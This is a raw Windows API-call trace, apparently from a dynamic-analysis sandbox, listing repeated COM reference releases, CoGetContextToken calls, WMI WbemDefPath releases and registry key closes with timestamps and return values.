[0281.617] IUnknown:Release (This=0x5703b48) returned 0x2 [0281.617] IUnknown:Release (This=0x5703b48) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.617] IUnknown:Release (This=0x5703ce0) returned 0x2 [0281.617] IUnknown:Release (This=0x5703ce0) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.617] IUnknown:Release (This=0x5703e78) returned 0x2 [0281.617] IUnknown:Release (This=0x5703e78) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.617] IUnknown:Release (This=0x5704010) returned 0x2 [0281.618] IUnknown:Release (This=0x5704010) returned 0x1 [0281.618] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.618] IUnknown:Release (This=0x57041a8) returned 0x2 [0281.618] IUnknown:Release (This=0x57041a8) returned 0x1 [0281.618] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.618] IUnknown:Release (This=0x5704340) returned 0x2 [0281.618] IUnknown:Release (This=0x5704340) returned 0x1 [0281.618] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.618] IUnknown:Release (This=0x57044d8) returned 0x2 [0281.618] IUnknown:Release (This=0x57044d8) returned 0x1 [0281.618] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.618] IUnknown:Release (This=0x5704670) returned 0x2 [0281.618] IUnknown:Release (This=0x5704670) returned 0x1 [0281.618] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.618] IUnknown:Release (This=0x5704808) returned 0x2 [0281.618] IUnknown:Release (This=0x5704808) returned 0x1 [0281.618] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.618] IUnknown:Release (This=0x57049a0) returned 0x2 [0281.618] IUnknown:Release (This=0x57049a0) returned 0x1 [0281.618] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.618] IUnknown:Release (This=0x5704b38) returned 0x2 [0281.618] IUnknown:Release (This=0x5704b38) returned 0x1 [0281.618] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.618] IUnknown:Release (This=0x5704cd0) returned 0x2 [0281.618] IUnknown:Release (This=0x5704cd0) returned 0x1 [0281.618] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.618] IUnknown:Release (This=0x5704e68) returned 0x2 [0281.618] IUnknown:Release (This=0x5704e68) returned 0x1 [0281.618] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.618] IUnknown:Release (This=0x5705000) returned 0x2 [0281.619] IUnknown:Release (This=0x5705000) returned 0x1 [0281.619] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.619] IUnknown:Release (This=0x5705198) returned 0x2 [0281.619] IUnknown:Release (This=0x5705198) returned 0x1 [0281.619] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.619] IUnknown:Release (This=0x5705330) returned 0x2 [0281.619] IUnknown:Release (This=0x5705330) returned 0x1 [0281.619] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.619] IUnknown:Release (This=0x57054c8) returned 0x2 [0281.619] IUnknown:Release (This=0x57054c8) returned 0x1 [0281.619] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.619] IUnknown:Release (This=0x5712260) returned 0x2 [0281.619] IUnknown:Release (This=0x5712260) returned 0x1 [0281.619] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.619] IUnknown:Release (This=0x57123f8) returned 0x2 [0281.619] IUnknown:Release (This=0x57123f8) returned 0x1 [0281.619] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.619] IUnknown:Release (This=0x5712590) returned 0x2 [0281.619] IUnknown:Release (This=0x5712590) returned 0x1 [0281.619] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.619] IUnknown:Release (This=0x5712728) returned 0x2 [0281.619] IUnknown:Release (This=0x5712728) returned 0x1 [0281.619] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.619] IUnknown:Release (This=0x57128c0) returned 0x2 [0281.619] IUnknown:Release (This=0x57128c0) returned 0x1 [0281.619] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.619] IUnknown:Release (This=0x5712a58) returned 0x2 [0281.619] IUnknown:Release (This=0x5712a58) returned 0x1 [0281.619] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.619] IUnknown:Release (This=0x5712bf0) returned 0x2 [0281.620] IUnknown:Release (This=0x5712bf0) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.620] IUnknown:Release (This=0x5712d88) returned 0x2 [0281.620] IUnknown:Release (This=0x5712d88) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.620] IUnknown:Release (This=0x5712f20) returned 0x2 [0281.620] IUnknown:Release (This=0x5712f20) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.620] IUnknown:Release (This=0x57130b8) returned 0x2 [0281.620] IUnknown:Release (This=0x57130b8) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.620] IUnknown:Release (This=0x5713250) returned 0x2 [0281.620] IUnknown:Release (This=0x5713250) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.620] IUnknown:Release (This=0x57133e8) returned 0x2 [0281.620] IUnknown:Release (This=0x57133e8) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.620] IUnknown:Release (This=0x5713580) returned 0x2 [0281.620] IUnknown:Release (This=0x5713580) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.620] IUnknown:Release (This=0x5713718) returned 0x2 [0281.620] IUnknown:Release (This=0x5713718) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.620] IUnknown:Release (This=0x57138b0) returned 0x2 [0281.620] IUnknown:Release (This=0x57138b0) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.620] IUnknown:Release (This=0x5713a48) returned 0x2 [0281.620] IUnknown:Release (This=0x5713a48) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.620] IUnknown:Release (This=0x5713be0) returned 0x2 [0281.620] IUnknown:Release (This=0x5713be0) returned 0x1 [0281.620] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x5713d78) returned 0x2 [0281.621] IUnknown:Release (This=0x5713d78) returned 0x1 [0281.621] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x5713f10) returned 0x2 [0281.621] IUnknown:Release (This=0x5713f10) returned 0x1 [0281.621] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x57140a8) returned 0x2 [0281.621] IUnknown:Release (This=0x57140a8) returned 0x1 [0281.621] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x571c848) returned 0x2 [0281.621] IUnknown:Release (This=0x571c848) returned 0x1 [0281.621] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x571c9e0) returned 0x2 [0281.621] IUnknown:Release (This=0x571c9e0) returned 0x1 [0281.621] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x571cb78) returned 0x2 [0281.621] IUnknown:Release (This=0x571cb78) returned 0x1 [0281.621] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x571cd10) returned 0x2 [0281.621] IUnknown:Release (This=0x571cd10) returned 0x1 [0281.621] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x571cea8) returned 0x2 [0281.621] IUnknown:Release (This=0x571cea8) returned 0x1 [0281.621] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x571d040) returned 0x2 [0281.621] IUnknown:Release (This=0x571d040) returned 0x1 [0281.621] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x571d1d8) returned 0x2 [0281.621] IUnknown:Release (This=0x571d1d8) returned 0x1 [0281.621] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.621] IUnknown:Release (This=0x571d370) returned 0x2 [0281.622] IUnknown:Release (This=0x571d370) returned 0x1 [0281.622] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.622] IUnknown:Release (This=0x571d508) returned 0x2 [0281.622] IUnknown:Release (This=0x571d508) returned 0x1 [0281.622] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.622] IUnknown:Release (This=0x571d6a0) returned 0x2 [0281.622] IUnknown:Release (This=0x571d6a0) returned 0x1 [0281.622] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.622] IUnknown:Release (This=0x571d838) returned 0x2 [0281.622] IUnknown:Release (This=0x571d838) returned 0x1 [0281.622] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.622] IUnknown:Release (This=0x571d9d0) returned 0x2 [0281.622] IUnknown:Release (This=0x571d9d0) returned 0x1 [0281.622] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.622] IUnknown:Release (This=0x571db68) returned 0x2 [0281.622] IUnknown:Release (This=0x571db68) returned 0x1 [0281.622] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.622] IUnknown:Release (This=0x571dd00) returned 0x2 [0281.622] IUnknown:Release (This=0x571dd00) returned 0x1 [0281.622] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.622] IUnknown:Release (This=0x571de98) returned 0x2 [0281.622] IUnknown:Release (This=0x571de98) returned 0x1 [0281.622] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.622] IUnknown:Release (This=0x571e030) returned 0x2 [0281.622] IUnknown:Release (This=0x571e030) returned 0x1 [0281.628] IUnknown:Release (This=0x5713580) returned 0x0 [0281.629] IUnknown:Release (This=0x5947a8) returned 0x0 [0281.629] IUnknown:Release (This=0x57133e8) returned 0x0 [0281.629] IUnknown:Release (This=0x5713250) returned 0x0 [0281.630] IUnknown:Release (This=0x57130b8) returned 0x0 [0281.630] IUnknown:Release (This=0x5712f20) returned 0x0 [0281.630] IUnknown:Release (This=0x5712d88) returned 0x0 [0281.631] IUnknown:Release (This=0x5712bf0) returned 0x0 [0281.631] IUnknown:Release (This=0x5712a58) returned 0x0 [0281.631] IUnknown:Release (This=0x57128c0) returned 0x0 [0281.632] IUnknown:Release (This=0x5712728) returned 0x0 [0281.632] IUnknown:Release (This=0x5712590) returned 0x0 [0281.632] IUnknown:Release (This=0x57123f8) returned 0x0 [0281.633] IUnknown:Release (This=0x5712260) returned 0x0 [0281.633] IUnknown:Release (This=0x57054c8) returned 0x0 [0281.633] IUnknown:Release (This=0x5705330) returned 0x0 [0281.634] IUnknown:Release (This=0x5705198) returned 0x0 [0281.634] IUnknown:Release (This=0x5705000) returned 0x0 [0281.634] IUnknown:Release (This=0x5704e68) returned 0x0 [0281.635] IUnknown:Release (This=0x5704cd0) returned 0x0 [0281.635] IUnknown:Release (This=0x5704b38) returned 0x0 [0281.635] IUnknown:Release (This=0x57049a0) returned 0x0 [0281.636] IUnknown:Release (This=0x5704808) returned 0x0 [0281.636] IUnknown:Release (This=0x5704670) returned 0x0 [0281.637] IUnknown:Release (This=0x57044d8) returned 0x0 [0281.637] IUnknown:Release (This=0x5704340) returned 0x0 [0281.637] IUnknown:Release (This=0x57041a8) returned 0x0 [0281.638] IUnknown:Release (This=0x5704010) returned 0x0 [0281.638] IUnknown:Release (This=0x5703e78) returned 0x0 [0281.638] IUnknown:Release (This=0x5703ce0) returned 0x0 [0281.639] IUnknown:Release (This=0x5703b48) returned 0x0 [0281.639] IUnknown:Release (This=0x57039b0) returned 0x0 [0281.639] IUnknown:Release (This=0x5703818) returned 0x0 [0281.640] IUnknown:Release (This=0x5703680) returned 0x0 [0281.640] IUnknown:Release (This=0x5965f0) returned 0x0 [0281.640] IUnknown:Release (This=0x596458) returned 0x0 [0281.640] IUnknown:Release (This=0x5962c0) returned 0x0 [0281.640] IUnknown:Release (This=0x596128) returned 0x0 [0281.640] IUnknown:Release (This=0x595f90) returned 0x0 [0281.641] IUnknown:Release (This=0x595df8) returned 0x0 [0281.641] IUnknown:Release (This=0x595c60) returned 0x0 [0281.641] IUnknown:Release (This=0x595ac8) returned 0x0 [0281.641] IUnknown:Release (This=0x595930) returned 0x0 [0281.641] IUnknown:Release (This=0x595798) returned 0x0 [0281.641] IUnknown:Release (This=0x595600) returned 0x0 [0281.641] IUnknown:Release (This=0x595468) returned 0x0 [0281.641] IUnknown:Release (This=0x5952d0) returned 0x0 [0281.642] IUnknown:Release (This=0x595138) returned 0x0 [0281.642] IUnknown:Release (This=0x594fa0) returned 0x0 [0281.642] IUnknown:Release (This=0x594e08) returned 0x0 [0281.642] IUnknown:Release (This=0x594ad8) returned 0x0 [0281.642] IUnknown:Release (This=0x571e030) returned 0x0 [0281.642] IUnknown:Release (This=0x571de98) returned 0x0 [0281.643] IUnknown:Release (This=0x571dd00) returned 0x0 [0281.643] IUnknown:Release (This=0x571db68) returned 0x0 [0281.643] IUnknown:Release (This=0x571d9d0) returned 0x0 [0281.643] IUnknown:Release (This=0x571d838) returned 0x0 [0281.643] IUnknown:Release (This=0x571d6a0) returned 0x0 [0281.643] IUnknown:Release (This=0x571d508) returned 0x0 [0281.643] IUnknown:Release (This=0x571d370) returned 0x0 [0281.644] IUnknown:Release (This=0x571d1d8) returned 0x0 [0281.644] IUnknown:Release (This=0x571d040) returned 0x0 [0281.644] IUnknown:Release (This=0x571cea8) returned 0x0 [0281.644] IUnknown:Release (This=0x571cd10) returned 0x0 [0281.644] IUnknown:Release (This=0x571cb78) returned 0x0 [0281.644] IUnknown:Release (This=0x571c9e0) returned 0x0 [0281.645] IUnknown:Release (This=0x571c848) returned 0x0 [0281.645] IUnknown:Release (This=0x57140a8) returned 0x0 [0281.645] IUnknown:Release (This=0x5713f10) returned 0x0 [0281.645] IUnknown:Release (This=0x5713d78) returned 0x0 [0281.645] IUnknown:Release (This=0x5713be0) returned 0x0 [0281.645] IUnknown:Release (This=0x5713a48) returned 0x0 [0281.645] IUnknown:Release (This=0x57138b0) returned 0x0 [0281.646] IUnknown:Release (This=0x5713718) returned 0x0 [0281.646] RegCloseKey (hKey=0x47c) returned 0x0 [0281.646] RegCloseKey (hKey=0x478) returned 0x0 [0283.782] CoGetContextToken (in: pToken=0x107f634 | out: pToken=0x107f634) returned 0x0 [0283.782] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.782] WbemDefPath:IUnknown:Release (This=0x5a9028) returned 0x1 [0283.782] WbemDefPath:IUnknown:Release (This=0x5a9028) returned 0x0 [0283.783] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a9098) returned 0x1 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a9098) returned 0x0 [0283.783] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a9178) returned 0x1 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a9178) returned 0x0 [0283.783] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a9258) returned 0x1 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a9258) returned 0x0 [0283.783] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a9338) returned 0x1 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a9338) returned 0x0 [0283.783] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a9418) returned 0x1 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a9418) returned 0x0 [0283.783] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a94f8) returned 0x1 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a94f8) returned 0x0 [0283.783] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.783] WbemDefPath:IUnknown:Release (This=0x5a95d8) returned 0x1 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a95d8) returned 0x0 [0283.784] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a96b8) returned 0x1 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a96b8) returned 0x0 [0283.784] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9798) returned 0x1 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9798) returned 0x0 [0283.784] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9878) returned 0x1 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9878) returned 0x0 [0283.784] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9958) returned 0x1 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9958) returned 0x0 [0283.784] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9a38) returned 0x1 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9a38) returned 0x0 [0283.784] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9b18) returned 0x1 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9b18) returned 0x0 [0283.784] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.784] WbemDefPath:IUnknown:Release (This=0x5a9bf8) returned 0x1 [0283.785] WbemDefPath:IUnknown:Release (This=0x5a9bf8) returned 0x0 [0283.785] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.785] WbemDefPath:IUnknown:Release (This=0x5a9cd8) returned 0x1 [0283.785] WbemDefPath:IUnknown:Release (This=0x5a9cd8) returned 0x0 [0283.785] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.785] WbemDefPath:IUnknown:Release (This=0x5701ef0) returned 0x1 [0283.785] WbemDefPath:IUnknown:Release (This=0x5701ef0) returned 0x0 [0283.785] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.785] WbemDefPath:IUnknown:Release (This=0x5701fd0) returned 0x1 [0283.785] WbemDefPath:IUnknown:Release (This=0x5701fd0) returned 0x0 [0283.785] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.785] WbemDefPath:IUnknown:Release (This=0x57020b0) returned 0x1 [0283.785] WbemDefPath:IUnknown:Release (This=0x57020b0) returned 0x0 [0283.785] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.785] WbemDefPath:IUnknown:Release (This=0x5702190) returned 0x1 [0283.785] WbemDefPath:IUnknown:Release (This=0x5702190) returned 0x0 [0283.785] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.785] WbemDefPath:IUnknown:Release (This=0x5702270) returned 0x1 [0283.785] WbemDefPath:IUnknown:Release (This=0x5702270) returned 0x0 [0283.785] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.785] WbemDefPath:IUnknown:Release (This=0x5702350) returned 0x1 [0283.786] WbemDefPath:IUnknown:Release (This=0x5702350) returned 0x0 [0283.786] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.786] WbemDefPath:IUnknown:Release (This=0x5702430) returned 0x1 [0283.786] WbemDefPath:IUnknown:Release (This=0x5702430) returned 0x0 [0283.786] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.786] WbemDefPath:IUnknown:Release (This=0x5702510) returned 0x1 [0283.786] WbemDefPath:IUnknown:Release (This=0x5702510) returned 0x0 [0283.786] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.786] WbemDefPath:IUnknown:Release (This=0x57025f0) returned 0x1 [0283.786] WbemDefPath:IUnknown:Release (This=0x57025f0) returned 0x0 [0283.786] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.786] WbemDefPath:IUnknown:Release (This=0x57026d0) returned 0x1 [0283.786] WbemDefPath:IUnknown:Release (This=0x57026d0) returned 0x0 [0283.786] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.786] WbemDefPath:IUnknown:Release (This=0x57027b0) returned 0x1 [0283.786] WbemDefPath:IUnknown:Release (This=0x57027b0) returned 0x0 [0283.786] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.786] WbemDefPath:IUnknown:Release (This=0x5702890) returned 0x1 [0283.786] WbemDefPath:IUnknown:Release (This=0x5702890) returned 0x0 [0283.786] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702970) returned 0x1 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702970) returned 0x0 [0283.787] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702a50) returned 0x1 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702a50) returned 0x0 [0283.787] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702b30) returned 0x1 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702b30) returned 0x0 [0283.787] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702c10) returned 0x1 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702c10) returned 0x0 [0283.787] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702cf0) returned 0x1 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702cf0) returned 0x0 [0283.787] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702dd0) returned 0x1 [0283.787] WbemDefPath:IUnknown:Release (This=0x5702dd0) returned 0x0 [0283.787] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.787] WbemDefPath:IUnknown:Release (This=0x570dc88) returned 0x1 [0283.787] WbemDefPath:IUnknown:Release (This=0x570dc88) returned 0x0 [0283.787] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.788] WbemDefPath:IUnknown:Release (This=0x570dd68) returned 0x1 [0283.788] WbemDefPath:IUnknown:Release (This=0x570dd68) returned 0x0 [0283.788] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.788] WbemDefPath:IUnknown:Release (This=0x570de48) returned 0x1 [0283.788] WbemDefPath:IUnknown:Release (This=0x570de48) returned 0x0 [0283.788] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.788] WbemDefPath:IUnknown:Release (This=0x570df28) returned 0x1 [0283.788] WbemDefPath:IUnknown:Release (This=0x570df28) returned 0x0 [0283.788] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.788] WbemDefPath:IUnknown:Release (This=0x570e008) returned 0x1 [0283.788] WbemDefPath:IUnknown:Release (This=0x570e008) returned 0x0 [0283.788] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.788] WbemDefPath:IUnknown:Release (This=0x570e0e8) returned 0x1 [0283.788] WbemDefPath:IUnknown:Release (This=0x570e0e8) returned 0x0 [0283.788] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.788] WbemDefPath:IUnknown:Release (This=0x570e1c8) returned 0x1 [0283.788] WbemDefPath:IUnknown:Release (This=0x570e1c8) returned 0x0 [0283.788] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.788] WbemDefPath:IUnknown:Release (This=0x570e2a8) returned 0x1 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e2a8) returned 0x0 [0283.789] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e388) returned 0x1 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e388) returned 0x0 [0283.789] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e468) returned 0x1 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e468) returned 0x0 [0283.789] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e548) returned 0x1 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e548) returned 0x0 [0283.789] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e628) returned 0x1 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e628) returned 0x0 [0283.789] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e708) returned 0x1 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e708) returned 0x0 [0283.789] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e7e8) returned 0x1 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e7e8) returned 0x0 [0283.789] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.789] WbemDefPath:IUnknown:Release (This=0x570e8c8) returned 0x1 [0283.790] WbemDefPath:IUnknown:Release (This=0x570e8c8) returned 0x0 [0283.790] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.790] WbemDefPath:IUnknown:Release (This=0x570e9a8) returned 0x1 [0283.790] WbemDefPath:IUnknown:Release (This=0x570e9a8) returned 0x0 [0283.790] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.790] WbemDefPath:IUnknown:Release (This=0x570ea88) returned 0x1 [0283.790] WbemDefPath:IUnknown:Release (This=0x570ea88) returned 0x0 [0283.790] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.790] WbemDefPath:IUnknown:Release (This=0x570eb68) returned 0x1 [0283.790] WbemDefPath:IUnknown:Release (This=0x570eb68) returned 0x0 [0283.790] 